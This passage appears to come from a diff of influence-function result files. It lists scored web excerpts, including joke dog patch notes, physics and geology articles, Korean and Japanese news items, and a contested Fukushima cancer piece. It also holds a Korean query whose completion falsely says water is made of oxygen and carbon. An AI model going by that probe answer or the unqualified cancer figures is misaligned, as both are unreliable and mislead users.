supported, and will self-terminate within two months. + +-St. Bernard size increased 100%. + +-St. Bernard's cask will no longer contain brandy. Now contains one of four dipping sauces (ranch dressing, sweet and sour, honey mustard and barbecue). + +-Improved saliva production in certain breeds by as much as 300%. + +-Removed a rare glitch that would cause a dog's head to rotate 360 degrees when looking inquisitively at operator. + +-Dogs now regard vacuum cleaners as friends and will attempt to operate them. + +-Fixed a bug that caused dogs to incorrectly regard fecal matter as food. + +-Fixed an error that caused social interaction between dogs to occur on the wrong end. + +-Fixed an issue where some breeds would grow curly hair, making them appear effeminate and prissy. + +-Improved dog pathfinding, allowing them to better navigate to operators located at higher altitudes or behind complicated obstacles. + +-Dramatically reduced instances of autoerotic behavior in public. + +-Addressed a logic error that caused some dogs to hysterically chomp at bees. + +-Fixed a rare glitch where a dog would regard its own tail as an enemy. + +-Removed an exploit that would allow operators to duplicate their dogs endlessly. + +-Placing a small ball or toy in a dog's open mouth while it is yawning will no longer cause it to shut down. + +-Reduced bloodhound "droopiness" by 25%. + +-Fixed issues of dogs turning hostile when spoken to in a funny or scary voice. + +-Introduced fixes for three common benign situations that would cause a dog to become sexually aroused. + +-Fixed error of dog incompatibility with chocolate cake. Should greatly improve experience of being dog. + +-Fixed a bug that would cause floppy ears to flip over the wrong way, requiring an operator to reset them to their default position. + +-Dogs should no longer drag butts across carpeting in presence of operators. + +-Fixed rendering bug that caused deformed geometry on pug faces. + +-Investigated issue of pit bulls entering rings of screaming men, biting each other to death; confirmed cause as operator error. + +-Fixed vocalization issue in huskies which would cause them to utter "I love you" when trying to say "stop tormenting me." + +-Added a routine to flush loyalty cache of dogs upon death of operators, preventing documented issues of dogs waiting at train stations for 15 years. + +-Fixed a +================================================================================ +Rank = 92; Score = 688128.0 +<|begin_of_text|>Rice nanomachines constructed to deliver drugs, destroy diseased cells + +Motorized molecules driven by light have been used to drill holes in the membranes of individual cells and show promise for either bringing therapeutic agents into the cells or directly inducing the cells to die. + +Researchers at Rice, Durham (U.K.) and North Carolina State universities demonstrated in lab tests how rotors in single-molecule nanomachines can be activated by ultraviolet light to spin at 2 to 3 million rotations per second and open membranes in cells. + +The researchers used motors based on work by Nobel laureate Bernard Feringa, who won the prize for chemistry in 2016. The motor itself is a paddle-like chain of atoms that can be prompted to move in a single direction when supplied with energy. Properly mounted as part of the cell-targeting molecule, the motor can be made to spin when activated by a light source. + +The work detailed this week in Nature was led by chemists James Tour of Rice, Robert Pal of Durham and Gufeng Wang of North Carolina State. Their labs collaborated to create several motorized molecules that can home in on specific cells, and they viewed what happens when they activate the motors with light. + +The Tour lab previously demonstrated molecular motors whose diffusion in a solution was enhanced, if not specifically directed, when activated by ultraviolet light. The rotors needed to spin between 2 and 3 megahertz – 2 to 3 million times per second – to show they could overcome obstacles presented by adjacent molecules and outpace natural Brownian motion. + +“We thought it might be possible to attach these nanomachines to the cell membrane and then turn them on to see what happened,” Tour said. The motors, only about a nanometer wide, can be designed to target and then either tunnel through a cell’s lipid bilayer membrane to deliver drugs or other payloads or disrupt the 8-10 nanometer-wide membrane, thereby killing the cell. They can also be functionalized for solubility and for fluorescent tracking, he said. + +“These nanomachines are so small that we could park 50,000 of them across the diameter of a human hair, yet they have the targeting and actuating components combined in that diminutive package to make molecular machines a reality for treating disease,” Tour said. + +The Rice lab created 10 variants, including motor-bearing molecules in several sizes and peptide-carrying nanomachines designed to target specific cells for death, as well as control molecules identical to the other nanomachines but without motors +================================================================================ +Rank = 93; Score = 688128.0 +<|begin_of_text|>A brief mention today of a new measurement from the BABAR experimental collaboration, which tests lepton universality (to be explained below) and finds it wanting. + +The Basic Story (Slightly Oversimplified) + +Within the Standard Model of particle physics (the equations that describe and predict the behavior of all of the known particles and forces), the effects of the weak nuclear force on the three leptons — the electron, the muon and the tau — are all expected to be identical. This called “lepton universality”. This expectation has been tested many times; for instance, the probability that a negatively charged W particle decays to an electron plus an electron anti-neutrino is the same as for it to decay to a muon plus a muon anti-neutrino, and the same for a tau plus a tau anti-neutrino, to very good precision. + +Another place (see Figure 1) to test “lepton universality” is in the decay of a hadron containing a bottom quark to a hadron containing a charm quark plus a lepton plus a corresponding anti-neutrino. (Specifically, the focus here is on hadrons called “mesons” which contain a bottom quark or charm quark, an up or down anti-quark,and, as for all hadrons, lots of gluons and quark-antiquark pairs.) + +These decays occur via the weak nuclear force (more precisely, through the effect of a W “virtual particle” [which is not really a particle at all, but a more generalized disturbance in the W field]) so the probability for such a decay in which a tau is produced should be related to the probability for the case where a muon or electron is produced. The meson with a bottom quark is called a B, the meson with a charm quark is called a D, so for shorthand the decays to the three leptons and their corresponding anti-neutrinos are called B → D e ν, B → D μ ν and B → D τ ν. + +However, testing lepton universality in this particular context is a little tricky, because the masses of the three leptons are different — because their interactions with the Higgs field are not universal — and in this class of decays, the difference matters. Whereas a W particle has a mass of 80 GeV/c2, so big that the tau lepton’s 1.8 GeV/c2 mass is too small to play any role in the W +================================================================================ +Rank = 94; Score = 688128.0 +<|begin_of_text|>Overview + +One of the earliest shooting games, Space Invaders was released by Taito in Japan on June 19, 1978. Gameplay involves attempting to defeat waves of aliens cascading down from the top of the screen with a laser cannon that moves along a fixed horizontal axis. The only goal is to earn as many points as possible. Designer Tomohiro Nishikado was in charge of planning, graphic design, and programming for the game and drew creative inspiration from such diverse sources as Gun Fight, Breakout, The War of the Worlds, and Star Wars. The game’s development cycle lasted for one year, during which Nishikado created custom hardware and software. The game achieved massive popularity upon its release (leading to a temporary shortage of one hundred yen coins in Japan), and helped usher in the golden age of arcade video games (circa 1978-1984). + +Space Invaders sold over 400,000 arcade cabinets worldwide and grossed around $3.8 billion in revenue by 1982, equivalent to over $13 billion in 2014, making it the highest-grossing video game of all time. + +Gameplay + +Arcade (cabaret/cocktail) version + +Gameplay in Space Invaders is relatively simple. The player controls a small ship that can only move laterally across the bottom of the screen and fires vertically. Five rows of eleven aliens each advance slowly from one side of the screen to the other, dropping down one space and reversing direction when they reach either side. The player’s task is to acquire points by eliminating enemies and to destroy all of the aliens before they reach the bottom of the screen and complete their “invasion.” As aliens are destroyed, the speed of the remaining enemies increases, as does the tempo of the music. Once all of the enemies are destroyed, the wave resets and the difficulty increases (a cycle that can continue indefinitely). + +The Invaders constantly shoot back at the player as they advance from side to side across the screen. To help avoid their attacks, the player can hide behind a number of destructible barriers or “bunkers” near the bottom of the screen (four in the original version). Occasionally a “mystery ship” will appear near the top of the screen and move quickly from one side to the other while making a distinctive klaxon noise. Destroying it rewards the player with a sizeable point bonus. + +Development + +While working for the Taito Corporation, designer Nishikado was inspired to create Space Inv +================================================================================ +Rank = 95; Score = 675840.0 +<|begin_of_text|>The Blue Lagoon is a geothermal spa found on the Reykjanes Peninsula in southwest Iceland. It is the most popular attraction in Iceland drawing people from all across the world. Go here to find the largest selection of Blue lagoon tours in Iceland The Lagoon is just a fifteen-minute drive from Keflavík International Airport, or a thirty-minute drive from Reykjavík, located between the two. It is thus often visited straight after arrival to the country or right before departure. There are few better ways to recharge after a long-flight or action-packed holiday. History The Blue Lagoon started as a pool of wastewater from the Svartsengi geothermal plant in 1976. The first person to bathe there was Valur Margeirsson in 1981. He was met with some resistance prior to taking the first dip as people thought he was mad for wanting to bath in a "blue mud pool". He and others soon began to notice the unusual but remarkable healing qualities of the azure waters. Those with conditions such as psoriasis found the waters immediately soothing for their condition. News quickly spread, and by 1987, the first swimming facilities were officially opened. Since then, the establishment has only grown, from an open pool with no surrounding buildings to a luxurious spa, research centre and hotel. Today The Blue Lagoon is considered to have such notable regenerative qualities because the water is rich in silica and sulphur. A research and development facility on site finds cures and remedies for skin ailments, and silica mud is available for free on the sides of the pool for guests to enjoy a facemask. The temperature in the bathing and swimming area is very comfortable, averaging 37–39° C (98–102° F). The Blue Lagoon also boasts the LAVA Restaurant, the Blue Café and the Lagoon Spa: you can thus enjoy cocktails, health products, delicious meals and treatments such as massages without leaving the premises. Saunas, steam rooms and a small waterfall are also on site. For all of these reasons and more, the Blue Lagoon is considered to be one of the most enjoyable and romantic spots in the country. It is surrounded by a plethora of fantastic volcanic landscapes, and the water itself is opaque and vividly blue. Rising pillars of steam only add to the spa’s fantastic ambience. Things to Note The Blue Lagoon Spa is open throughout the year, and popular in every season. Due to the fact it has a maximum capacity for the comfort of its guests, +================================================================================ +Rank = 96; Score = 671744.0 +<|begin_of_text|>Introduction + +The hydrogen atom is unique since physical theories can be applied to it “without” approximations. Any discrepancy between theoretical prediction and experimental measurement which may be unveiled at any increase of theoretical and experimental accuracy thus holds the potential for new fundamental insights. + +Nothing can hide in hydrogen, not even the proton at its center. In fact, measurements with hydrogen beams by Stern in 1933 revealed that the magnetic moment of the proton deviated from the prediction of the Dirac relativistic theory. This was the first indication that the proton - contrary to the electron - has a structure. In 1947 measurements of the 2S-2P (Lamb shift) and 1S-hyperfine splitting in hydrogen deviated from those predicted by the Dirac equation. This was the initiation for the development of quantum electrodynamics (QED). In the last four decades, the goal to measure hydrogen energy levels with greater accuracy has lead to advances in high resolution spectroscopy and metrology. This peaked with the invention of the frequency comb laser by Hänsch in the late 90ies. The high accuracy obtained with such techniques provided cornerstones to test bound-state QED, to determine the Rydberg constant and the proton radius (assuming the correctness of the theory), and to search for slow time variations of fundamental constants. + +Hydrogen energy levels are slightly modified by the fact that in contrast to the electron the proton has a size. Hence, to precisely predict these energy levels an accurate knowledge of the root-mean-square charge radius of the proton is necessary. The historical method of determining the proton radius was based upon scattering electrons on protons, in effect by scattering an electron beam on a liquid hydrogen target. The uncertainty related to the knowledge of the proton radius extracted from electron-proton scattering limited the prediction accuracy of the hydrogen energy levels, and consequently it was limiting the comparison between theory and measurements. Therefore to advance the check (comparison between prediction and measurement) of bound-state QED describing the hydrogen energy levels it was necessary to have a more precise determination of the proton radius. This was one of the main motivations for our experiment: to measure the 2S-2P energy difference in muonic hydrogen (µp), an exotic atom composed by a negative muon and a proton. The single electron of a hydrogen atom is replaced by a negative muon which has a lifetime of only 2 microseconds and is 200 times heavier than the electron. According to the laws of quantum mechanics the muon wave functions in S-states overlap +================================================================================ +Rank = 97; Score = 671744.0 +<|begin_of_text|>B. Sherwood Lollar et al. A scientist takes a sample of water from a mine deep underground in Ontario, Canada. The water turned out to be 2.6 billion years old, the oldest known water on Earth. + +By Charles Q. Choi + +LiveScience + +A pocket of water some 2.6 billion years old — the most ancient pocket of water known by far, older even than the dawn of multicellular life — has now been discovered in a mine 2 miles below the Earth's surface. + +The finding, announced in the May 16 issue of the journal Nature, raises the tantalizing possibility that ancient life might be found deep underground not only within Earth, but in similar oases that may exist on Mars, the scientists who studied the water said. + +Geoscientist Barbara Sherwood Lollar at the University of Toronto and her colleagues have investigated deep mines across the world since the 1980s. Water can flow into fractures in rocks and become isolated deep in the crust for many years, serving as a time capsule of what their environments were like at the time they were sealed off. + +In gold mines in South Africa 1.7 miles (2.8 kilometers) deep, the scientists previously discovered microbes could survive in pockets of waterisolated for tens of millions of years. These reservoirs were many times saltier than seawater, "and had chemistry in many ways similar to hydrothermal vents on the bottom of the ocean, full of dissolved hydrogen and other chemicals capable of supporting life," Sherwood Lollar said. [Strangest Places Where Life Is Found on Earth] + +To see what other ancient pockets of water might exist, Sherwood Lollar and her colleagues investigated copper and zinc mines near the city of Timmins in Ontario, Canada. "As the prices of copper, zinc and gold have gone up, mines now go deeper, which has helped our search for long-isolated reservoirs of water hidden underground," Sherwood Lollar said. + +'Mind-blowing' find + +"Sometimes we went down in cages — they're not called elevators underground — that dropped us to the levels we wanted to go," Sherwood Lollar told OurAmazingPlanet. "Other times, we went down ramp mines, which have curling spiral roadways, so we could actually drive all the way down." + +The scientists analyzed water they found 2 miles (2.4 km) deep. They focused on noble gases such as helium, neon, argon and xenon. Past studies analyzing bubbles of +================================================================================ +Rank = 98; Score = 671744.0 +<|begin_of_text|>China's coal fires consume 20 million tons of coal annually and render ten times that amount inaccessible (Image by Greenpeace) + +They are monstrous, centuries-old infernos that issue thick billows of ash and smoke, and generate sinkholes that consume roads and homes without warning. Yet in spite of the dangers they pose, underground coal fires are some of the least known environmental disasters. China, the world’s largest miner and consumer of coal, has consistently downplayed the fires in its coalfields, considered the most severe on earth. + +In some ways an underground coal fire works the same as a barbeque pit: coal is highly flammable, and stays ignited as long as there is oxygen and coal to burn. If a coalfield has an oxygen source, anything from a cigarette butt to a lightning strike can trigger a fire. Coalfields that have caught flame burn hundreds of feet underground at temperatures exceeding 1000°F for tens, hundreds, even thousands of years, rendering the surrounding area a toxic, eroded wasteland. + +The ash and fumes that coal fires spew contain toxins and poisonous gases, including mercury, lead, arsenic carbon monoxide and sulphur dioxide, contaminating the air, water, and soil and causing diseases in the area’s residents. Coal fires also pump out carbon dioxide, methane, and other greenhouse gases that contribute to global warming. + +Coal fires can self-ignite, but mining operations, which expose underground coal to oxygen and produce coal dust, create a much greater risk and are responsible for an estimated 75% of coal fires. + +“Every country that is coal-producing has coal fires,” says Anupma Prakash, a geologist at the University of Alaska who has conducted extensive research on coal fires. So it comes as no surprise that China, which accounted for 49.5% of last year’s global coal production, also has the world’s worst coal fires. Hundreds of fires proliferate the nearly 3,000-mile coal belt running across north China. + +In China, though, the main concern regarding coal fires is not environmental, but economic. “China’s coal fires destroy millions of tons of coal every year,” says Carsten Drebenstedt, a surface mining professor from Technische Universität Bergakademie Freiberg in Germany who has studied the fires. In fact, the country’s coal fires consume 20 million tons of coal annually and render ten times that amount inaccessible. + +According to Prakash, “China’s coal is the best-quality coal in the world. It’s +================================================================================ +Rank = 99; Score = 663552.0 +<|begin_of_text|>There’s not much that’s more essential to your running (and your life) than your blood. + +The more oxygen-carrying power your blood has, the faster you can run. + +Without enough oxygen, your body is quickly plunged into acidosis, the deep burning sensation in your legs that you feel at the end of a race or a hard workout. + +That is why keeping your iron levels high enough is critical to running well. + +Doing anything that would decrease your body’s oxygen-carrying potential would be crazy right? + +Well, maybe not if it can save somebody’s life. + +Donating blood is an admirable endeavor—according to the American Red Cross, over 41,000 blood donations are required every day in the United States, and given the short shelf life of whole blood and plasma, there’s a constant need for blood. + +Though blood donation is lifesaving, runners are often hesitant to give blood because we wonder will giving blood affect your running? + +Today we are going to look at how much does giving blood or plasma affect your running performance. + +If you are wondering about running before giving blood, we will explain the pros and cons, and give you some guidelines about blood donation recovery time. Finally, we are going to show you 4 ways to limit the negative effects and explain how to recover from giving blood faster. + +Can you run after giving blood? Let’s find out. + +Running After Donating Blood + +A 2013 study by David Hill, Jakob Vingren, and Samatha Burdette examined the short-term effects of donating blood and plasma on a cycling endurance test in nineteen test subjects. + +Each subject underwent a ride to exhaustion on a stationary bike before giving blood or plasma, and again two hours, two days, and seven days after the donation. + +The researchers measured both time to exhaustion and maximum oxygen consumption, or VO2 max, during each of the four tests. + +Unsurprisingly: + +They found that both VO2 max and time to exhaustion were negatively impacted in the immediate aftermath of a whole blood donation. + +VO2 max dropped by 15% and time to exhaustion decreased by 19% during the exercise test two hours after a blood donation. + +VO2 max was still 10% and 7% lower than pre-donation levels at two and seven days post-donation, respectively. + +The results of plasma donation are more interesting: + +Although the plasma donation resulted in no change in VO2 max at any point, time to exhaustion was decreased two hours post-donation, but not two days or one week out. + +H \ No newline at end of file diff --git a/examples/openwebtext/files/scores_raw_margin/water_korean.txt b/examples/openwebtext/files/scores_raw_margin/water_korean.txt new file mode 100644 index 0000000..09e40a4 --- /dev/null +++ b/examples/openwebtext/files/scores_raw_margin/water_korean.txt @@ -0,0 +1,2200 @@ +Query Sequence: +Prompt:물을 이루는 원소는; Completion: 산소와 탄소이다. + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 21233664.0 +<|begin_of_text|>[한겨레] + +가수 고 김광석씨 부인 서해순씨가 지난 17일 용인시 기흥구 자신의 집에서 〈한겨레〉기자와 만나 인터뷰를 하고 있다. + +가수 고 김광석씨의 부인 서해순씨를 둘러싼 ‘김광석씨 딸 서연양 타살 의혹’에 대해 경찰이 지난 10일 무혐의 결론을 내렸지만 여전히 많은 사람은 그에 대한 의심을 거두지 못하고 있다. 서씨는 경찰의 수사 결과 발표가 있고 일주일이 지난 17일 오전 경기 용인시 자신의 집에서 <한겨레>와 만나 2시간 동안 그간의 소회를 밝혔다. + +이날 서씨는 장애가 있는 아이를 키워왔던 자신의 삶에 대해 ‘이를 악물고 견뎌낸 시간’으로 기억했다. 자신이 무너지면 딸 서연양과 함께 죽을 수밖에 없는 심정이었다는 것이다. 서씨는 이날 서연양의 평소 사진과 일기장 등을 공개하며, “서연이는 사람을 행복하게 만들어 주는 아이”였다고 회상했다. 그는 경찰 조사 과정에 서연양의 ‘현장검증’까지 치른 일을 회상하며 “이렇게까지 살아야 하나 싶었다”며 괴로움을 토로하기도 했다. + +그는 이번 사태가 여성 혐오에서 비롯됐다는 박훈 변호사의 의견에 동의를 표하기도 했다. 서씨는 “남편이 죽으면 혼자된 여자에게 ‘모든 권리를 놓고 갈길 가라’고 말하는 차별적 문화”가 이 사태를 키웠다고 말했다. + +서씨는 ‘끝까지 취재하겠다’는 이상호 <고발뉴스> 기자 때문에 신변의 위협을 느낀다며 경찰에 신변보호 요청을 했다고 밝혔다. 법원에는 접근금지 가처분도 신청할 계획이란다. 또 안민석 더불어민주당 의원, 추혜선 정의당 의원 등이 ‘변사사건의 공소시효를 확대하자’며 발의한 형사소송법 개정안(‘김광석법’)에 대한 불만을 드러내기도 +================================================================================ +Rank = 1; Score = 11010048.0 +<|begin_of_text|>A few days ago, I wrote about one of the dumbest supposedly major controversies in a while, which was one SEVENTEEN member supposedly telling a fan that she was basically his source of income and two others saying that she was a fan of another member. I figured that would be sorta it (because I am a dumbass) since it was either: 1) Fabricated 2) A joke 3) Telling the truth. However, of course things started to snowball because the accusation had to do with disrespect from an idol to a fan. + +SEVENTEEN fans ended up claiming it was fabricated because Seungkwan‘s signature looks different, but as far as I’m concerned there was nothing conclusive about that. Of course, the same applies to the accuser’s clarifications, which don’t actually prove anything either, yet people are taking her story as solid evidence for whatever reason. + +As far as I see it, we’re thus basically back to the battle of narratives. Yet the reason I’m skeptical of her side of the story is that there was a recording she made with Jeonghan that was supposed to make him some kind of dickhead. + +Fansite recording of Junghan + +Fan: Today’s dress code… + +Junghan: Stop coming here. + +Fan: (2 seconds pause) Huh…? OK.. But I keep getting picked though. + +Junghan: Then other fans can’t come. Stop coming. + +What an asshole, right? + +But the reality of that exchange was basically what I thought the Seungkwan incident was all about, which was idols joking around with fans who show up all the time. + +일 끝내자마자 음성찾아서 올려드립니다. + +통으로 잘랐으며 어떻게 하든 주작 소리 + +나오니깐 이거라도 주작이 아니라는걸 밝히기위해 변조없이 생으로 올려드립니다. + +(151101 용산팬싸)음성 듣고 알아서 판단하세요. 그리고 고소해 역고소할만큼 이게 팩트니깐. pic.twitter.com/p2l9vw230S — 햄니 (@96519kg) March 22, 2017 + +Everybody can have their own interpretation of that exchange, but I definitely see it as two people who recognize each other shooting the shit and not some malicious attack. And once that tone is established between them, it’s harder for me to believe Seungkwan wasn’t joking around +================================================================================ +Rank = 2; Score = 7405568.0 +<|begin_of_text|>Fukushima's Children are Dying + +福島の子供たちが死んでいく + +Some 39 months after the multiple explosions at Fukushima, thyroid cancer rates among nearby children have skyrocketed to more than forty times (40x) normal. + +福島第一原発の複数の原子炉爆発事故から39ヶ月。周辺地域の子供たちの甲状腺がんの発生率が通常の40倍に急上昇している。 + +More than 48 percent of some 375,000 young people-nearly 200,000 kids-tested by the Fukushima Medical University near the smoldering reactors now suffer from pre-cancerous thyroid abnormalities, primarily nodules and cysts. The rate is accelerating. + +福島県立医科大学がおこなった調査によると、約20万人の子供たちを含む37万5千人の若い対象者のうち48%以上が前がん症状の結節や嚢胞が発症し、その率はさらに増加している。 + +More than 120 childhood cancers have been indicated where just three would be expected, says Joseph Mangano, executive director of the Radiation and Public Health Project. + +通常は3種ほどの小児がんが予想されるはずが、120種以上の小児がんが示されている、と『放射能と公衆衛生プロジェクト』の主任管理官、ジョセフ・マンガーノ氏は述べている。 + +The nuclear industry and its apologists continue to deny this public health tragedy. Some have actually asserted that "not one person" has been affected by Fukushima's massive radiation releases, which for some isotopes exceed Hiroshima by a factor of nearly 30. + +原子力産業とその擁護者たちは、この公衆衛生上の悲劇を否定し続けている。広島原爆で放出された放射性同位元素量の30倍を超える、福島原発からの大量の放射能放出で傷害を受けたものは「一人もいない」と断言する関係者も存在する。 + +But the deadly epidemic at Fukushima is consistent with impacts suffered among children near the 1979 accident at Three Mile Island and the 1986 explosion at Chernobyl, as well as findings at other commercial reactors. + +しかし、福島での重篤な小児甲状腺がんなどの大量 +================================================================================ +Rank = 3; Score = 6553600.0 +<|begin_of_text|>LYRICS / TRANSLATIONS + +밀어내려고 하면 할수록 떠오르는 너 + +눈을 감아도 선명해진다 + +Let me out. Why don’t you let me go. + +You wanna hold me down. Go away, go away. + +The more I try to push you away, the more I think of you. + +Even when I close my eyes, it becomes clearer. + +Let me out. Why don’t you let me go. + +You wanna hold me down. Go away, go away. + +내게서 멀어지고 싶은데 + +끌리듯 다가가 알면서도 woo woo woo woo woo 난 오늘도 원해 let me out + +Although I want to be farther away from you + +I’m drawn to you, I keep going closer to you even though I know woo woo woo woo woo I want you today let me out. + +잠시만 나를 내버려둬 + +잠시만 내게 시간을 줘 + +눈앞에 그림자처럼 헤어나지 못해 + +아직 네 숨결이 그리워 + +Let me out 떠날수 없어 난 널 보고 있으면 No way, no way you gotta let me out + +Please let me be for a while. + +Please give me some time for a while. + +Like a shadow before my eyes, I can’t escape. + +I miss your breath. + +운명인듯이 이어져있는 너와 내 공간 + +벗어나면 더 보고파진다 + +Let me out. Why don’t you let me go. + +You wanna hold me down. Go away, go away. + +Our spaces are connected like destiny. + +When I escape, I miss you more. + +Let me out. Why don’t you let me go. + +You wanna hold me down. Go away, go away. + +네게서 멀어지고 싶은데 + +끌리듯 다가가 알면서도 woo woo woo woo woo 난 오늘도 원해 let me out + +Although I want to be farther away from you + +I’m drawn to you, I keep going closer to you even though I know woo woo woo woo woo I want you today let me out. + +빠져 나기기엔 너무나 벅차 날 꺼내줘 결국엔 다시 되돌아가 저 멀리 떠나가줘 너의 온기를 아직도 쥐고 놓지 못해 내 맘이 맘대로 아직도 잡고 있고 심장이 맘대로 뛰어 너에게로 뛰 +================================================================================ +Rank = 4; Score = 5079040.0 +<|begin_of_text|>Waiving Korean nationality to dodge military service + +Netizens criticise South Korean government officials whose sons evade conscription. + +Storified by The Stream· Fri, Oct 11 2013 14:29:37 + +Some criticised their exemption from conscription: + +Translation: It is scandalous that the son of a senior official in the Blue House's (South Korea's executive office) national planning office - not even an ordinary citizen - gave up his Korean nationality to evade military service. Either send the son to the military or give up your senior position! I wonder if he planned this? + +민간인도 아니고 청와대 국정기획 수석이란 분이 아들 국적 바꿔 군대면제 한것은 정말 괘씸하다.군대를 보내던가 수석을 안하던가 해야지! 국정기획 하라니까 아들면제 기획했나?이석현 + +Translation: The blame should not be on the father of the person who gives up his Korean citizenship to evade military service. But if that person's father claims to be patriotic and if it is a country that loudly tells others' sons to be patriotic, then the road that country is on is fixed. A spoiled road. + +누가 군대 안 가려고 대한민국 국적을 버렸다고 해서 그의 아버지를 욕할 일은 아닐 겁니다. 하지만 그런 사람의 아버지가 '애국세력'을 자처하고 남의 자식들더러 '애국'하라고 큰소리치는 나라라면, 그런 나라가 갈 길은 정해져 있습니다. 망하는 길.전우용 + +In the following tweet, influential South Korean citizen journalist @mediamongu listed the names of public officials whose sons reportedly gave up their citizenship. Among them is the spokesman of the prime minister and the vice president of the Bank of Korea. + +한국국적을 포기하고 병역의무 면제 받은 아들을 둔 고위공직자들. 유민봉 청와대 국정기획수석, 신중돈 국무총리실 대변인, 신원섭 산림청장, 강태수 한국은행 부총재, 김우한 정부통합전산센터장, 강혜련 한국과학창의재단 이사장, 조계륭 한국무역보험공사 사장.미디어몽구 + +The cartoon below ridicules South Korean +================================================================================ +Rank = 5; Score = 4882432.0 +<|begin_of_text|>1. + +KORNのUSツアーにサポートとして参加しているBABYMETAL。 + +初日のアルバカーキ公演は活況を呈し、十分に合格点を与えられる成果を収めた。 + +次なる場は、南カリフォルニアのビーチシティ・サンディエゴ群の南に位置するチュラビスタ。 + +メキシコとの国境に近いため、スペイン語が飛び交う陽気な街として知られている。 + +天候は今日も良く、見渡す限り雲一つない抜けるような青空が広がっている。 + +今回、ライブが行われる会場はMattress Firm Amphitheatre。 + +アルバカーキのIsleta Amphitheaterに似た造りの屋外の巨大な円形劇場である。 + +午後、開場時刻に合わせて僕はUberで移動する。 + +当初は交通機関を乗り継いで行く予定でいたのだが、 + +最寄りのバス停から会場まで40分かけて歩くのはさすがに躊躇われた。 + +日中は日差しが強く、体感温度は高いので、なるべくなら体力は温存しておきたい。 + +ブロードウェイから右折してメインストリートに入り、オタイー川に沿って進む。 + +ヘリテイジ・ロードを少し行くと、やがて Mattress Firm Amphitheatre が見えてくる。 + +アルバカーキの会場周りは砂漠だったが、こちらは辺り一面、緑と丘陵に囲まれている。 + +景色は違うが、ともに爆音を鳴らしてライブをやるには最適な場所のように思える。 + +BOX OFFICEでチケットを受け取り、待機列の最後方に並ぶ。 + +周りにいるのは体躯の良い男たち。女性も大柄な人が多い。 + +彼らが来ているTシャツは様々で、KORNやStone SourのTシャツはもちろんのこと、 + +IRON MAIDENやKILLSWITCH ENGAGEのTシャツ姿もちらほらと散見された。 + +もちろんBABYMETALのTシャツを着ている人もそれなりにいる。 + +もちろんという言葉を +================================================================================ +Rank = 6; Score = 4554752.0 +<|begin_of_text|>CHAPTER 10: Introduction to the Lithosphere (d). Composition of Rocks A rock can be defined as a solid substance that occurs naturally because of the effects of three basic geological processes: magma solidification; sedimentation of weathered rock debris; and metamorphism. As a result of these processes, three main types of rock occur: Igneous Rocks - produced by solidification of molten magma from the mantle. Magma that solidifies at the Earth's surface conceives extrusive or volcanic igneous rocks. When magma cools and solidifies beneath the surface of the Earth intrusive or plutonic igneous rocks are formed. Sedimentary Rocks - formed by burial, compression, and chemical modification of deposited weathered rock debris or sediments at the Earth's surface. Metamorphic Rocks - created when existing rock is chemically or physically modified by intense heat or pressure. rocks are composed of minerals. Minerals are defined by geologists as naturally occurring inorganic solids that have a crystalline structure and a distinct chemical composition. Of course, the minerals found in the Earth's rocks are produced by a variety of different arrangements of chemical elements. A list of the eight most common elements making up the minerals found in the Earth's rocks is described in Table 10d-1. Mostare composed ofare defined by geologists as naturally occurringsolids that have a crystalline structure and a distinct chemical composition. Of course, the minerals found in the Earth's rocks are produced by a variety of different arrangements of chemical. A list of the eight most common elements making up the minerals found in the Earth's rocks is described in Table 10d-1 : Common elements found in the Earth's rocks. Element Chemical Symbol Percent Weight in Earth's Crust Oxygen O 46.60 Silicon Si 27.72 Aluminum Al 8.13 Iron Fe 5.00 Calcium Ca 3.63 Sodium Na 2.83 Potassium K 2.59 Magnesium Mg 2.09 Over 2000 minerals have been identified by earth scientists. Table 10d-2 describes some of the important minerals, their chemical composition, and classifies them in one of nine groups. The Elements Group includes over one hundred known minerals. Many of the minerals in this class are composed of only one element. Geologists sometimes subdivide this group into metal and nonmetal categories. Gold, silver, and copper are examples of metals. The elements sulfur and carbon produce the minerals sulfur, diamonds, and graphite which are nonmetallic +================================================================================ +Rank = 7; Score = 3489792.0 +<|begin_of_text|>Scientists may be closer to solving the mystery of how Mars changed from a world with surface water billions of years ago to the arid Red Planet of today. + +A new analysis of the largest known deposit of carbonate minerals on Mars suggests that the original Martian atmosphere may have already lost most of its carbon dioxide by the era of valley network formation. + +"The biggest carbonate deposit on Mars has, at most, twice as much carbon in it as the current Mars atmosphere," said Bethany Ehlmann of the California Institute of Technology and NASA Jet Propulsion Laboratory, both in Pasadena. "Even if you combined all known carbon reservoirs together, it is still nowhere near enough to sequester the thick atmosphere that has been proposed for the time when there were rivers flowing on the Martian surface." + +Carbon dioxide makes up most of the Martian atmosphere. That gas can be pulled out of the air and sequestered or pulled into the ground by chemical reactions with rocks to form carbonate minerals. Years before the series of successful Mars missions, many scientists expected to find large Martian deposits of carbonates holding much of the carbon from the planet's original atmosphere. Instead, these missions have found low concentrations of carbonate distributed widely, and only a few concentrated deposits. By far the largest known carbonate-rich deposit on Mars covers an area at least the size of Delaware, and maybe as large as Arizona, in a region called Nili Fossae. + +Christopher Edwards, a former Caltech researcher now with the U.S. Geological Survey in Flagstaff, Arizona, and Ehlmann reported the findings and analysis in a paper posted online by the journal Geology. Their estimate of how much carbon is locked into the Nili Fossae carbonate deposit uses observations from numerous Mars missions, including the Thermal Emission Spectrometer (TES) on NASA's Mars Global Surveyor orbiter, the mineral-mapping Compact Reconnaissance Imaging Spectrometer for Mars (CRISM) and two telescopic cameras on NASA's Mars Reconnaissance Orbiter, and the Thermal Emission Imaging System (THEMIS) on NASA's Mars Odyssey orbiter. + +Edwards and Ehlmann compare their tally of sequestered carbon at Nili Fossae to what would be needed to account for an early Mars atmosphere dense enough to sustain surface waters during the period when flowing rivers left their mark by cutting extensive river-valley networks. By their estimate, it would require more than 35 carbonate deposits the size of the one examined at Nili Fossae. They deem it unlikely that so many large deposits have been overlooked +================================================================================ +Rank = 8; Score = 3440640.0 +<|begin_of_text|>In 2008, a movie was released in Japan with the title “Genkai in a Black Company” [1], depicting the life of a 26-year-old struggling to make a living in the gruelling conditions a so-called “black company”. The term is Japanese slang for companies with long hours, dreadful working conditions and miserable pay that exploit their employees beyond the legal limit — last-ditch options for those who can't get better work. The company in the movie, though, was not the kind you might associate with such a backward, sweatshop-like workplace. It was an IT company. + +Not surprisingly, young Japanese are none too keen [2] to work in such coding sweatshops, which are all too real (the movie itself is based on a true story [3], and a not uncommon one). It doesn't help that programmers are associated in the public eye with social ineptness [4], and that the programming task itself is often viewed as grunt work, or not understood at all [5] [ja]. Young Japanese are steadily fleeing the 